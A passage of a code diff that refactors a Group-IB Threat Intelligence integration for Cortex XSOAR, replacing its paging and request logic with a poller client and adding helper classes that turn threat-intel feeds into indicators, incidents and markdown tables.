base_url=base_url, verify=verify, proxy=proxy, headers=headers, auth=auth + ) - yield portion.get("items"), seq_update + self._auth: tuple[str, str] + self.poller = TIPoller( + username=self._auth[0], + api_key=self._auth[1], + api_url=base_url, + ) + self.poller.set_product( + product_type="SOAR", + product_name="CortexSOAR", + product_version="unknown", + integration_name="Group-IB Threat Intelligence", + integration_version="2.0.0", + ) - def _create_search_generator(self, collection_name: str, max_requests: int, date_to: str = None, - page: int = 0, starting_date_from: str = None, - starting_date_to: str = None, limit: int = 200) -> Generator: + @staticmethod + def handle_first_time_fetch(kwargs: dict[str, Any]) -> tuple[str, str | None]: """ - Creates generator of lists with feeds for the search session for ingestion purpose - (feeds are sorted in descending order) for `collection_name` with set parameters. 
This version solves problem - with a large number of feeds with the same date. - - :param collection_name: collection to search. - :param max_requests: a maximum number of requests to API. - :param date_to: current search location. - :param page: number of pages from start. - :param starting_date_from: global down border for a session. - :param starting_date_to: global upper border for a session. + Handle first time fetch """ + date_from = None + last_fetch = kwargs.get("last_fetch") + if not last_fetch: + date_from = dateparser_parse(date_string=kwargs.get("first_fetch_time")) # type: ignore + if date_from is None: + raise DemistoException( + "Inappropriate first_fetch format, " + f"please use a format such as: 2020-01-01 or January 1 2020 or 3 days. The format given is: {date_from}" + ) + date_from = date_from.strftime("%Y-%m-%d") # type: ignore - requests_count = 0 - result_id = None - no_data_flag = 0 - while True: - if requests_count >= max_requests or no_data_flag: - break - - if page and not result_id: - k = 0 - while k != page: - if result_id: - params = {'resultId': result_id} - else: - params = {'df': starting_date_from, 'dt': date_to} - params = assign_params(**params) - portion = self._http_request(method="GET", url_suffix=collection_name, - params=params, timeout=TIMEOUT, retries=RETRIES, - status_list_to_retry=STATUS_LIST_TO_RETRY) - result_id = portion.get("resultId") - k += 1 - - if result_id: - params = {'resultId': result_id} - else: - params = {'df': starting_date_from, 'dt': date_to} - params = assign_params(**params) - portion = self._http_request(method="GET", url_suffix=collection_name, - params=params, timeout=TIMEOUT, retries=RETRIES, - status_list_to_retry=STATUS_LIST_TO_RETRY) + return last_fetch, date_from # type: ignore - requests_count += 1 - data = portion.get('items') - if len(data) < 100: - no_data_flag = 1 - page = 0 - starting_date_from = (dateparser.parse(starting_date_to) # type: ignore - + 
timedelta(seconds=1)).strftime(DATE_FORMAT) - starting_date_to = datetime.now().strftime(DATE_FORMAT) - date_to = starting_date_to - else: - if data[0].get("uploadTime") == data[-1].get("uploadTime"): - page += 1 - else: - result_id = None - page = 0 - for i in range(len(data) - 1, -1, -1): - if data[i].get("uploadTime") != data[-1].get("uploadTime"): - upload_time_parsed = dateparser.parse(data[i].get("uploadTime")) - assert upload_time_parsed is not None, f'could not parse {data[i].get("uploadTime")}' - date_to = (upload_time_parsed - timedelta(seconds=1)).strftime(DATE_FORMAT) - data = data[:i + 1:] - break - - last_fetch = {"starting_date_from": starting_date_from, "page": page, - "starting_date_to": starting_date_to, "current_date_to": date_to} - yield data, last_fetch - - # def _create_legacy_generator(self, action: str, max_requests: int, last: Optional[str] = None) -> Generator: - # """ - # Legacy generator is similar to update generator. - # - # :param action: collection to search. - # :param max_requests: a maximum number of requests to API. - # :param last: identification number from which to start the session. 
- # """ - # requests_count = 0 - # while True: - # if requests_count >= max_requests: - # break - # - # params = {"action": action, "last": last, "module": "get", "lang": 3} - # params = assign_params(**params) - # portion = self._http_request(method="GET", full_url="https://bt.group-ib.com", - # headers=LEGACY_HEADERS, params=params, timeout=TIMEOUT, retries=RETRIES, - # status_list_to_retry=STATUS_LIST_TO_RETRY) - # if portion.get("status") != 200: - # if portion.get("status") in STATUS_CODE_MSGS: - # raise DemistoException(STATUS_CODE_MSGS[portion.get("status")]) - # else: - # raise DemistoException( - # "Something is wrong, status code {0} for request to APIv1".format(portion.get("status")) - # ) - # portion = portion.get("data") - # - # if portion.get("count") == 0: - # break - # last = portion.get("last") - # requests_count += 1 - # - # yield portion.get("new"), last - # - # def _legacy_get_last(self, date_from, action): - # """ - # Get last for a certain date. - # - # :param action: collection to search. - # :param date_from: date to get the "last" identifier. - # """ - # params = {"action": "get_last", "date": date_from, "module": "get", "type": action} - # params = assign_params(**params) - # resp = self._http_request(method="GET", full_url="https://bt.group-ib.com", - # headers=LEGACY_HEADERS, params=params, timeout=TIMEOUT, retries=RETRIES, - # status_list_to_retry=STATUS_LIST_TO_RETRY) - # if resp.get("status") != 200: - # if resp.get("status") in STATUS_CODE_MSGS: - # raise DemistoException(STATUS_CODE_MSGS[resp.get("status")]) - # else: - # raise DemistoException( - # "Something is wrong, status code {0} for request to APIv1".format(resp.get("status")) - # ) - # last = resp.get("data") - # return last - - def create_poll_generator(self, collection_name: str, max_requests: int, **kwargs): + def create_poll_generator( + self, collection_name: str, hunting_rules: int, **kwargs + ): """ Interface to work with different types of indicators. 
""" - # Handle first time fetch - date_from = None - last_fetch = kwargs.get("last_fetch") - if not last_fetch: - date_from = dateparser.parse(kwargs.get("first_fetch_time")) # type: ignore - if date_from is None: - raise DemistoException('Inappropriate first_fetch format, ' - 'please use something like this: 2020-01-01 or January 1 2020 or 3 days') - date_from = date_from.strftime('%Y-%m-%d') # type: ignore + last_fetch, date_from = Client.handle_first_time_fetch(kwargs) if collection_name == "compromised/breached": + hunting_rules = 1 + # we need the isinstance check for BC because it used to be a string + if last_fetch and isinstance(last_fetch, dict): starting_date_from = last_fetch.get("starting_date_from") starting_date_to = last_fetch.get("starting_date_to") date_to = last_fetch.get("current_date_to") - page = last_fetch.get("page", 0) else: starting_date_from = date_from starting_date_to = datetime.now().strftime(DATE_FORMAT) date_to = starting_date_to - page = 0 - return self._create_search_generator(collection_name=collection_name, max_requests=max_requests, - date_to=date_to, page=page, starting_date_from=starting_date_from, - starting_date_to=starting_date_to) - # elif collection_name == "bp/domain": - # if not last_fetch: - # last_fetch = self._legacy_get_last(date_from=date_from, action="domain") - # return self._create_legacy_generator(action="domain", max_requests=max_requests, last=last_fetch) + + return self.poller.create_search_generator( + collection_name=collection_name, + date_from=date_from, + date_to=date_to, + limit=self.limit, + apply_hunting_rules=hunting_rules, + ), { + "starting_date_from": starting_date_from, + "starting_date_to": starting_date_to, + "current_date_to": date_to, + } + else: - return self._create_update_generator(collection_name=collection_name, max_requests=max_requests, - date_from=date_from, seq_update=last_fetch) # type: ignore + if collection_name in COLLECTIONS_THAT_ARE_REQUIRED_HUNTING_RULES: + hunting_rules = 1 + 
return ( + self.poller.create_update_generator( + collection_name=collection_name, + date_from=date_from, + sequpdate=last_fetch, + limit=self.limit, + apply_hunting_rules=hunting_rules, + ), + last_fetch, + ) + + def search_proxy_function(self, query: str) -> list[dict[str, Any]]: + return self.poller.global_search(query=query) + + def get_available_collections_proxy_function(self) -> list: + return self.poller.get_available_collections() - def create_manual_generator(self, collection_name: str, date_from: str = None, - date_to: str = None, query: str = None) -> Generator: - """ - Creates generator of lists with feeds for the search session - (feeds are sorted in descending order) for `collection_name` with set parameters. - :param collection_name: collection to search. - :param date_from: start date of search session. - :param date_to: end date of search session. - :param query: query to search. - """ +""" Support functions """ - result_id = None - while True: - params = {'df': date_from, 'dt': date_to, 'resultId': result_id, 'q': query} - params = assign_params(**params) - portion = self._http_request(method="GET", url_suffix=collection_name, - params=params, timeout=TIMEOUT, retries=RETRIES, - status_list_to_retry=STATUS_LIST_TO_RETRY) - if portion.get('count') > 2000: - raise DemistoException('Portion is too large (count > 2000), this can cause timeout in Demisto.' - 'Please, change or set date_from/date_to arguments or change query.') - if len(portion.get('items')) == 0: - break - result_id = portion.get("resultId") - date_from, date_to, query = None, None, None - yield portion.get('items') - def search_feed_by_id(self, collection_name: str, feed_id: str) -> dict: - """ - Searches for feed with `feed_id` in collection with `collection_name`. 
+class CommonHelpers: + @staticmethod + def transform_dict( + input_dict: dict[str, list[str | list[Any]] | str | None] + ) -> list[dict[str, Any]]: + if not input_dict: + return [{}] - :param collection_name: in what collection to search. - :param feed_id: id of feed to search. - """ - portion = self._http_request(method="GET", url_suffix=collection_name + "/" + feed_id, timeout=TIMEOUT, - retries=RETRIES, status_list_to_retry=STATUS_LIST_TO_RETRY, - backoff_factor=random.random() * 10 + 1) + normalized_dict = { + k: v if isinstance(v, list) else [v] for k, v in input_dict.items() # type: ignore + } - return portion + max_length = max( + (len(v) for v in normalized_dict.values() if isinstance(v, list)), default=1 + ) - def get_available_collections(self): - """ - Gets list of available collections from GIB TI&A API. - """ + result = [] + for i in range(max_length): + result.append( + { + k: (v[i] if i < len(v) else (v[0] if v else None)) + for k, v in normalized_dict.items() + } + ) - response = self._http_request(method="GET", url_suffix="user/granted_collections", - timeout=TIMEOUT, retries=RETRIES, - status_list_to_retry=STATUS_LIST_TO_RETRY) - buffer_list = find_element_by_key(response, 'collection') - - # buffer_list = list(response.get("list").keys()) - # - # try: - # self._http_request(method="GET", url_suffix="compromised/breached", params={"limit": 1}, - # timeout=TIMEOUT, retries=RETRIES, status_list_to_retry=STATUS_LIST_TO_RETRY) - # buffer_list.append("compromised/breached") - # except Exception: - # pass - # - # # legacy collection - # try: - # params = {"action": "get_last", "date": datetime.now().strftime("%Y-%m-%d"), - # "module": "get", "type": "domain"} - # response = self._http_request(method="GET", full_url="https://bt.group-ib.com", - # headers=LEGACY_HEADERS, params=params, timeout=TIMEOUT, retries=RETRIES, - # status_list_to_retry=STATUS_LIST_TO_RETRY) - # last = response.get("data") - # params = {"action": "domain", "last": last, "module": 
"get"} - # portion = self._http_request(method="GET", full_url="https://bt.group-ib.com", - # headers=LEGACY_HEADERS, params=params, timeout=TIMEOUT, retries=RETRIES, - # status_list_to_retry=STATUS_LIST_TO_RETRY) - # if portion.get("status") == 200: - # buffer_list.append("bp/domain") - # except Exception: - # pass - - collections_list = [] - for key in MAPPING: - if key in buffer_list: - collections_list.append(key) - return {"collections": collections_list}, buffer_list - - def search_by_query(self, q): - results = self._http_request(method="GET", url_suffix="search", params={'q': q}, - timeout=TIMEOUT, retries=RETRIES, - status_list_to_retry=STATUS_LIST_TO_RETRY) - return results + return result + @staticmethod + def remove_underscore_and_lowercase_keys( + dict_list: list[dict[str, Any]] | list[dict[str, Any]] + ) -> list[dict[str, Any]]: + updated_dicts = [] -def test_module(client: Client) -> str: - """ - Returning 'ok' indicates that the integration works like it is supposed to. Connection to the service is successful. + for d in dict_list: + new_dict = {} + for key, value in d.items(): + new_key = key.replace("_", "").lower() + new_dict[new_key] = value - :param client: GIB_TI&A client - :return: 'ok' if test passed, anything else will fail the test. - """ + updated_dicts.append(new_dict) - collections_list, _ = client.get_available_collections() - for collection in collections_list.get("collections"): - if collection not in MAPPING: - return "Test failed, some problems with getting available collections." 
- return "ok" + return updated_dicts + @staticmethod + def replace_empty_values( + data: dict[str, Any] | list[dict[str, Any]] + ) -> dict[str, Any] | list[dict[str, Any]]: -""" Support functions """ + if isinstance(data, dict): + return { + key: CommonHelpers.replace_empty_values(value) + for key, value in data.items() + } + elif isinstance(data, list): + if not data: + return None # type: ignore -def find_element_by_key(obj, key): - """ - Recursively finds element or elements in dict. - """ + if all(isinstance(item, list) and not item for item in data): + return None # type: ignore + + return [CommonHelpers.replace_empty_values(item) for item in data] # type: ignore - path = key.split(".", 1) - if len(path) == 1: - if isinstance(obj, list): - return [i.get(path[0]) for i in obj if i not in ["255.255.255.255", "0.0.0.0", ""]] - elif isinstance(obj, dict): - if obj.get(path[0]) in ["255.255.255.255", "0.0.0.0", ""]: - return None - else: - return obj.get(path[0]) - else: - if obj in ["255.255.255.255", "0.0.0.0", ""]: - return None - else: - return obj - else: - if isinstance(obj, list): - return [find_element_by_key(i.get(path[0]), path[1]) for i in obj] - elif isinstance(obj, dict): - return find_element_by_key(obj.get(path[0]), path[1]) else: - if obj in ["255.255.255.255", "0.0.0.0", ""]: + if data == "": return None + return data + + @staticmethod + def all_lists_empty(data: dict[str, Any] | list[Any]) -> bool: + all_empty = True + + if isinstance(data, dict): + for value in data.values(): + if isinstance(value, list): + if value: + all_empty = False + elif isinstance(value, dict) and not CommonHelpers.all_lists_empty(value): + all_empty = False + elif isinstance(data, list): + for item in data: + if isinstance(item, dict) and not CommonHelpers.all_lists_empty(item): + all_empty = False + + return all_empty + + @staticmethod + def date_parse(date: str, arg_name: str) -> str: + date_from_parsed = dateparser_parse(date) + if date_from_parsed is None: + raise 
DemistoException( + f"Inappropriate {arg_name} format, " + "please use something like this: 2020-01-01 or January 1 2020" + ) + date_from_parsed = date_from_parsed.strftime(DATE_FORMAT) + return date_from_parsed + + @staticmethod + def remove_html_tags(entry: dict, collection_name: str) -> dict: + if collection_name in HTML_FIELDS: + fields = HTML_FIELDS.get(collection_name, []) + for field in fields: + entry_field_value = entry.get(field, None) + if isinstance(entry_field_value, str): + entry_field_value = re.sub(r"<[^>]+>", "", entry_field_value) + entry[field] = entry_field_value + + return entry + + @staticmethod + def transform_list_to_str(data: list[dict]) -> list[dict]: + for item in data: + if isinstance(item, dict): + for key, value in item.items(): + if isinstance(value, list): + item[key] = ", ".join(str(v) for v in value) + return data + + @staticmethod + def custom_generate_portal_link(collection_name: str, incident: dict): + if ( + collection_name + in COLLECTIONS_FOR_WHICH_THE_PORTAL_LINK_WILL_BE_GENERATED + ): + # generating just for compromised/breached + incident["portalLink"] = PORTAL_LINKS.get( + "compromised/breached", "" + ) + str(incident["emails"][0]) + + return incident + + @staticmethod + def validate_collections(collection_name): + + if collection_name in DEPRECATED_COLLECTIONS: + raise Exception( + f"Collection {collection_name} is obsolete. 
Please use {DEPRECATED_COLLECTIONS.get(collection_name)}") + if collection_name in REMOVED_COLLECTIONS: + raise Exception(f"The {collection_name} collection is not valid") + + +class IndicatorsHelper: + + @staticmethod + def check_empty_list(add_fields: dict) -> bool: + dict_len = len(add_fields) + empty_found_count = 0 + for _key, value in add_fields.items(): + if isinstance(value, list) and len(value) < 1: + empty_found_count += 1 + + return dict_len == empty_found_count + + @staticmethod + def parse_to_outputs( + value: str | None | list, indicator_type: str, fields: dict + ) -> Any: + def calculate_dbot_score(type_): + severity = fields.get("evaluation", {}).get("severity") + if severity == "green": + score = Common.DBotScore.GOOD + elif severity == "orange": + score = Common.DBotScore.SUSPICIOUS + elif severity == "red": + score = Common.DBotScore.BAD else: - return obj - + score = Common.DBotScore.NONE + + return Common.DBotScore( + indicator=value, + indicator_type=type_, + integration_name="GIB TI&A", + score=score, + ) + + indicator: Any = None + if ( + (value is not None and len(value) > 0) or len(fields) > 0 + ) and IndicatorsHelper.check_empty_list(fields) is False: + if indicator_type == "IP": + indicator = Common.IP( + ip=value, + asn=fields.get("asn"), + geo_country=fields.get("geocountry"), + geo_description=fields.get("geolocation"), + dbot_score=calculate_dbot_score(DBotScoreType.IP), + ) + elif indicator_type == "Domain": + indicator = Common.Domain( + domain=value, + registrar_name=fields.get("registrarname"), + dbot_score=calculate_dbot_score(DBotScoreType.DOMAIN), + ) + elif indicator_type == "File": + indicator = Common.File( + md5=value, + sha1=fields.get("sha1"), + sha256=fields.get("sha256"), + name=fields.get("gibfilename"), + size=fields.get("size"), + dbot_score=calculate_dbot_score(DBotScoreType.FILE), + ) + elif indicator_type == "URL": + indicator = Common.URL( + url=value, dbot_score=calculate_dbot_score(DBotScoreType.URL) + ) + 
elif indicator_type == "CVE": + indicator = Common.CVE( + id=value, + cvss=fields.get("cvss"), + published=fields.get("published"), + modified=fields.get("cvemodified"), + description=fields.get("cvedescription"), + ) + return indicator + + @staticmethod + def find_iocs_in_feed(feed: str | dict[Any, Any], collection_name: str) -> list: + """ + Finds IOCs in the feed and transform them to the appropriate format to ingest them into Demisto. -def transform_to_command_results(iocs, ioc_type, fields, fields_names, collection_name): - """ - Recursively ties together and transforms indicator data. - """ + :param feed: feed from GIB TI&A. + :param collection_name: which collection this feed belongs to. + """ - parsed_info = [] - if isinstance(iocs, list): - for i, ioc in enumerate(iocs): - buf_fields = [] - for field in fields: - if isinstance(field, list): - buf_fields.append(field[i]) - else: - buf_fields.append(field) - parsed_info.extend(transform_to_command_results(ioc, ioc_type, buf_fields, fields_names, collection_name)) - return parsed_info - else: - if iocs is None: - return [] - - fields = {fields_names[i]: fields[i] for i in range(len(fields_names)) if fields[i] is not None} - - output = parse_to_outputs(iocs, ioc_type, fields) - if output: - results = [CommandResults( - readable_output=tableToMarkdown(f"{ioc_type} indicator", {"value": iocs, **fields}), - indicator=output, - ignore_auto_extract=True - )] - return results - else: - return [] - - -def parse_to_outputs(value, indicator_type, fields): - def calculate_dbot_score(type_): - severity = fields.get("severity") - if severity == "green": - score = Common.DBotScore.GOOD - elif severity == "orange": - score = Common.DBotScore.SUSPICIOUS - elif severity == "red": - score = Common.DBotScore.BAD - else: - score = Common.DBotScore.NONE + indicators = [] + if isinstance(feed, dict) and feed.get("indicators", None) is not None: + indicator_types: dict = INDICATORS_TYPES.get(collection_name, {}).get("types", {}) # 
type: ignore + add_fields_types: dict = INDICATORS_TYPES.get(collection_name, {}).get( + "add_fields_types", {} + ) # type: ignore + if len(add_fields_types.keys()) > 0: + fedd_indicators: dict = feed["indicators"] + fedd_indicators.update( + {"severity": feed.get("evaluation", {}).get("severity")} + ) + + for indicator_type_name, indicator_type in indicator_types.items(): + add_fields = {} + indicator_value = fedd_indicators.get(indicator_type_name) + if indicator_type_name in add_fields_types: + for ( + additional_field_name, + additional_field_type, + ) in add_fields_types.get( + indicator_type_name + ).items(): # type: ignore + additional_field_value = fedd_indicators.get( + additional_field_name + ) + if additional_field_value is not None: + add_fields.update( + {additional_field_type: additional_field_value} + ) + + output = IndicatorsHelper.parse_to_outputs( + indicator_value, indicator_type, add_fields + ) + if output: + if len(add_fields) > 0: + add_fields.update( + {"severity": feed.get("evaluation", {}).get("severity")} + ) + results = [ + CommandResults( + readable_output=tableToMarkdown( + f"{indicator_type} indicator", + {"value": indicator_value, **add_fields}, + ), + indicator=output, + ignore_auto_extract=True, + ) + ] + indicators.append(results) + + return indicators + + +class IncidentBuilder: + fields_list_for_parse = [ + "creationdate", + "firstseenbysource", + "lastseenbysource", + "gibdatecompromised", + ] + + def __init__(self, collection_name: str, incident: dict, mapping: dict) -> None: + self.collection_name = collection_name + self.incident = incident + self.mapping = mapping + + def get_system_severity(self) -> int: + severity_map = { + "green": NumberedSeverity.LOW.value, + "orange": NumberedSeverity.MEDIUM.value, + "red": NumberedSeverity.HIGH.value, + } + severity = self.incident.get("evaluation", {}).get("severity") + return severity_map.get(severity, 0) - return Common.DBotScore( - indicator=value, - indicator_type=type_, - 
integration_name="GIB TI&A", - score=score + def get_incident_created_time(self) -> str: + occured_date_field = INCIDENT_CREATED_DATES_MAPPING.get( + self.collection_name, "-" ) - if indicator_type == "IP": - return Common.IP(ip=value, asn=fields.get("asn"), geo_country=fields.get("geocountry"), - geo_description=fields.get("geolocation"), - dbot_score=calculate_dbot_score(DBotScoreType.IP)) - elif indicator_type == "Domain": - return Common.Domain(domain=value, registrar_name=fields.get("registrarname"), - dbot_score=calculate_dbot_score(DBotScoreType.DOMAIN)) - elif indicator_type == "File": - return Common.File(md5=value, sha1=fields.get("sha1"), sha256=fields.get("sha256"), - name=fields.get("gibfilename"), size=fields.get("size"), - dbot_score=calculate_dbot_score(DBotScoreType.FILE)) - elif indicator_type == "URL": - return Common.URL(url=value, dbot_score=calculate_dbot_score(DBotScoreType.URL)) - elif indicator_type == "CVE": - return Common.CVE(id=value, cvss=fields.get("cvss"), published=fields.get("published"), - modified=fields.get("cvemodified"), description=fields.get("cvedescription")) - return None - - -def find_iocs_in_feed(feed: dict, collection_name: str) -> list: - """ - Finds IOCs in the feed and transform them to the appropriate format to ingest them into Demisto. - - :param feed: feed from GIB TI&A. - :param collection_name: which collection this feed belongs to. 
- """ - - indicators = [] - indicators_info = MAPPING.get(collection_name, {}).get("indicators", []) - for i in indicators_info: - main_field = find_element_by_key(feed, i["main_field"]) - main_field_type = i["main_field_type"] - add_fields = [] - add_fields_list = i.get("add_fields", []) + ["evaluation.severity"] - add_fields_types = i.get("add_fields_types", []) + ["severity"] - for j in add_fields_list: - add_fields.append(find_element_by_key(feed, j)) - parsed_info = transform_to_command_results(main_field, main_field_type, - add_fields, add_fields_types, collection_name) - indicators.extend(parsed_info) + if isinstance(occured_date_field, str): + occured_date_field = [occured_date_field] + + if not isinstance(occured_date_field, list): + raise DemistoException(f"Expected list or string for occured_date_field, got {type(occured_date_field).__name__}") + + for variant in occured_date_field: + try: + incident_occured_date = dateparser_parse( + date_string=self.incident.get(variant, "") + ) + assert incident_occured_date is not None, ( + f"{self.incident} incident_occured_date cannot be None, " + f"occured_date_field: {variant}, incident_occured_date: {incident_occured_date}" + ) + return incident_occured_date.strftime(DATE_FORMAT) + except AssertionError as e: + last_exception = e + + raise AssertionError( + f"None of the date fields {occured_date_field} returned a valid date. Last error: {last_exception}" + ) - return indicators + def get_incident_name(self) -> str: + name = "" + prefix = PREFIXES.get(self.collection_name, "") + if self.collection_name == "compromised/breached": + names = self.incident["name"] + if not isinstance(names, list): + names = [names] + name = f"{prefix}: " + ", ".join(names) + else: + name = f"{prefix}: {self.incident['name']}" + return name -def transform_some_fields_into_markdown(collection_name, feed: dict) -> dict: - """ - Some fields can have complex nesting, so this function transforms them into an appropriate state. 
+ def set_custom_severity(self): + severity_map = { + "green": StringSeverity.LOW.value, + "orange": StringSeverity.MEDIUM.value, + "red": StringSeverity.HIGH.value, + } + severity = self.incident.get("evaluation", {}).get("severity") + if severity: + self.incident["evaluation"]["severity"] = severity_map.get(severity, "Unknown") + + @staticmethod + def date_conversion(date: str): + try: + date_obj = datetime.strptime(date, "%Y-%m-%d") + return date_obj.isoformat() + except ValueError: + try: + datetime.fromisoformat(date) + return None + except ValueError: + raise ValueError(f"Invalid date format provided: {date}") + + def check_dates(self): + for field, value in self.incident.items(): + if field in SET_WITH_ALL_DATE_FIELDS and value is not None: + new_value = self.date_conversion(value) + if new_value: + self.incident[field] = new_value + + def osi_public_leak_mathes_transform_to_grid_table(self, field: str): + field_data = self.incident.get(field, {}) + if field_data: + new_matches = [] + if isinstance(field_data, list): + field_data = {} + for type_, sub_dict in field_data.items(): + for sub_type, sub_list in sub_dict.items(): + for value in sub_list: + new_matches.append( + {"type": type_, "sub_type": sub_type, "value": value} + ) + + transformed_and_replaced_empty_values_data = ( + CommonHelpers.replace_empty_values(new_matches) + ) + clean_data = CommonHelpers.remove_underscore_and_lowercase_keys( + transformed_and_replaced_empty_values_data # type: ignore + ) + self.incident[field] = clean_data + + def transform_fields_to_grid_table(self): + fields_for_modify_in_table = TABLES_MAPPING.get(self.collection_name, []) + + if fields_for_modify_in_table: + for field in fields_for_modify_in_table: + if self.collection_name == "osi/public_leak" and field == "matches": + self.osi_public_leak_mathes_transform_to_grid_table(field=field) + else: + field_data = self.incident.get(field, {}) + + if ( + field_data + and CommonHelpers.all_lists_empty(field_data) is False + 
): + transformed_data = CommonHelpers.transform_dict( + input_dict=field_data + ) + if ( + self.collection_name == "osi/git_repository" + and field == "files" + ): + + transformed_data = CommonHelpers.transform_list_to_str( + transformed_data + ) + + transformed_and_replaced_empty_values_data = ( + CommonHelpers.replace_empty_values(transformed_data) + ) + clean_data = CommonHelpers.remove_underscore_and_lowercase_keys( + transformed_and_replaced_empty_values_data # type: ignore + ) + + self.incident[field] = clean_data + else: + self.incident[field] = None + + def build_incident(self) -> dict: + self.incident = CommonHelpers.custom_generate_portal_link(collection_name=self.collection_name, incident=self.incident) + incident_name = self.get_incident_name() + system_severity = self.get_system_severity() + self.incident.update( + { + "name": incident_name, + "gibType": self.collection_name, + "systemSeverity": system_severity, + } + ) - :param collection_name: which collection this feed belongs to. - :param feed: feed from GIB TI&A that needs transformation. - :return: given feed with transformed fields. 
- """ + self.set_custom_severity() + self.check_dates() + self.transform_fields_to_grid_table() + self.incident = CommonHelpers.remove_html_tags( + self.incident, self.collection_name + ) + data = { + "name": self.incident["name"], + "occurred": self.get_incident_created_time(), + "rawJSON": json_dumps(self.incident), + "dbotMirrorId": self.incident.get("id"), + } + return data + + +class BuilderCommandResponses: + + def __init__(self, client: Client, collection_name: str, args: dict) -> None: + self.client = client + self.collection_name = collection_name + self.args = args + + def transform_additional_fields_to_markdown_tables(self, feed: dict): + additional_tables = [] + delete_keys = [] + for key, value in feed.items(): + if key not in ("evaluation", "indicators") and isinstance(value, dict): + additional_data = CommonHelpers.transform_dict(value) + for index, item in enumerate(additional_data): + table = self.get_human_readable_feed( + table=item, name=f"{key} table {index}" + ) + additional_tables.append( + CommandResults( + readable_output=table, + ignore_auto_extract=True, + ) + ) + delete_keys.append(key) + for key in delete_keys: + feed.pop(key) + + return feed, additional_tables + + def get_feed(self) -> dict: + id_ = str(self.args.get("id")) + if self.collection_name in ["threat", "threat_actor"]: + flag = self.args.get("isAPT") + if flag: + self.collection_name = "apt/" + self.collection_name + else: + self.collection_name = "hi/" + self.collection_name + + cleaned_feed = {} + if ( + self.collection_name + in COLLECTIONS_THAT_MAY_NOT_SUPPORT_ID_SEARCH_VIA_UPDATED + ): + if self.collection_name == "osi/public_leak": + query = f"id:{id_}" + else: + query = id_ + portions = self.client.poller.create_update_generator( + collection_name=self.collection_name, query=query + ) + for portion in portions: + parsed_portion = portion.parse_portion( + keys=MAPPING.get(self.collection_name, {}) + ) + cleaned_feed = parsed_portion[0] if isinstance(parsed_portion, 
list) else parsed_portion # type: ignore - if collection_name == "osi/git_repository": - buffer = "" - files = feed.get("files", []) - for i in files: - url = i.get("url") - date = i.get("dateCreated") - # file_diff = "[https://bt.group-ib.com/api/v2/osi/git_leak]({0})".format(i.get("fileDiff")) - # info = find_element_by_key(i,'revisions.info') - author_email = ''.join(str(find_element_by_key(i, 'revisions.info.authorEmail'))) - author_name = ''.join(str(find_element_by_key(i, 'revisions.info.authorName'))) - timestamp = ''.join(str(find_element_by_key(i, 'revisions.info.timestamp'))) - # author_email, author_name, date = info.get("authorEmail"), info.get("authorName"), info.get("dateCreated") - buffer += f"| {url} | {author_email} | {author_name} | {date} | {timestamp} |\n" - if buffer: - buffer = "| URL | Author Email | Author Name | Date Created| TimeStamp |\n" \ - "| ---- | --------------- | ------------ | ----------- | ------------ |\n" + buffer - feed["files"] = buffer - else: - del feed["files"] - - elif collection_name == "osi/public_leak": - buffer = "" - link_list = feed.get("linkList", []) - for i in link_list: - author = i.get("author") - detected = i.get("dateDetected") - published = i.get("datePublished") - hash_ = i.get("hash") - link = "[{0}]({0})".format(i.get("link")) - source = i.get("source") - buffer += f"| {author} | {detected} | {published} | {hash_} | {link} | {source} |\n" - if buffer: - buffer = "| Author | Date Detected | Date Published | Hash | Link | Source |\n" \ - "| ------ | ------------- | -------------- | ---- |----- | ------ |\n" + buffer - feed["linkList"] = buffer else: - del feed["linkList"] - - buffer = "" - matches = feed.get("matches", {}) - if isinstance(matches, list): - matches = {} - for type_, sub_dict in matches.items(): - for sub_type, sub_list in sub_dict.items(): - for value in sub_list: - buffer += f"| {type_} | {sub_type} | {value} |\n" - if buffer: - buffer = "| Type | Sub Type | Value |\n" \ - "| ---- | 
-------- | ----- |\n" + buffer - feed["matches"] = buffer - else: - del feed["matches"] - - elif collection_name == "bp/phishing_kit": - buffer = "" - downloaded_from = feed.get("downloadedFrom", []) - for i in downloaded_from: - date, url, domain, filename = i.get("date"), i.get("url"), i.get("domain"), i.get("fileName") - buffer += f"| {url} | (unknown) | {domain} | {date} |\n" - if buffer: - buffer = "| URL | File Name | Domain | Date |\n| --- | --------- | ------ | ---- |\n" + buffer - feed["downloadedFrom"] = buffer - else: - del feed["downloadedFrom"] + result = self.client.poller.search_feed_by_id(self.collection_name, id_) + parsed_portion = result.parse_portion( + keys=MAPPING.get(self.collection_name, {}) + ) + cleaned_feed = parsed_portion[0] if isinstance(parsed_portion, list) else parsed_portion # type: ignore + + return cleaned_feed # type: ignore + + def get_indicators( + self, feed: dict[Any, Any] + ) -> tuple[list[CommandResults] | list, dict[Any, Any]]: + indicators = [] + indicators = IndicatorsHelper.find_iocs_in_feed( + feed=feed, collection_name=self.collection_name + ) - return feed + return indicators, feed + def get_table_data( + self, + feed: dict[Any, Any], + ): + dont_need_transformations = ["compromised/breached"] -def get_human_readable_feed(collection_name, feed): - return tableToMarkdown(name="Feed from {} with ID {}".format(collection_name, feed.get("id")), - t=feed, removeNull=True) + main_table_data, additional_tables = feed, ( + [] + if self.collection_name in dont_need_transformations + else self.transform_additional_fields_to_markdown_tables(feed) + ) + return main_table_data, additional_tables -def transform_function(result, previous_keys="", is_inside_list=False): - result_dict = {} - additional_tables: list[Any] = [] + def get_human_readable_feed(self, table: dict[Any, Any], name: str): + return tableToMarkdown( + name=name, + t=table, + removeNull=True, + ) - if isinstance(result, dict): - if is_inside_list: - 
additional_tables.append(result) - else: - for key, value in result.items(): - sub_key = previous_keys + " " + key if previous_keys else key - transformed_part, additional_info = transform_function(value, previous_keys=sub_key, - is_inside_list=is_inside_list) - result_dict.update(transformed_part) - additional_tables.extend(additional_info) - - return result_dict, additional_tables - - elif isinstance(result, list): - is_inside_list = True - for value in result: - transformed_part, additional_info = transform_function(value, previous_keys=previous_keys, - is_inside_list=is_inside_list) - additional_tables.extend(additional_info) - if result_dict.get(previous_keys) is None: - result_dict.update(transformed_part) - else: - result_dict[previous_keys].extend(transformed_part[previous_keys]) + def build_feed(self): + feed = self.get_feed() + feed = CommonHelpers.custom_generate_portal_link(collection_name=self.collection_name, incident=feed) + indicators, feed = self.get_indicators(feed=feed) + main_table_data, additional_tables = self.get_table_data(feed=feed) + feed_id = feed.get("id") + readable_output = self.get_human_readable_feed( + table=feed, name=f"Feed from {self.collection_name} with ID {feed_id}" + ) + return feed, main_table_data, additional_tables, indicators, readable_output - if additional_tables: - additional_tables = [CommandResults( - readable_output=tableToMarkdown(f"{previous_keys} table", additional_tables, removeNull=True), - ignore_auto_extract=True - 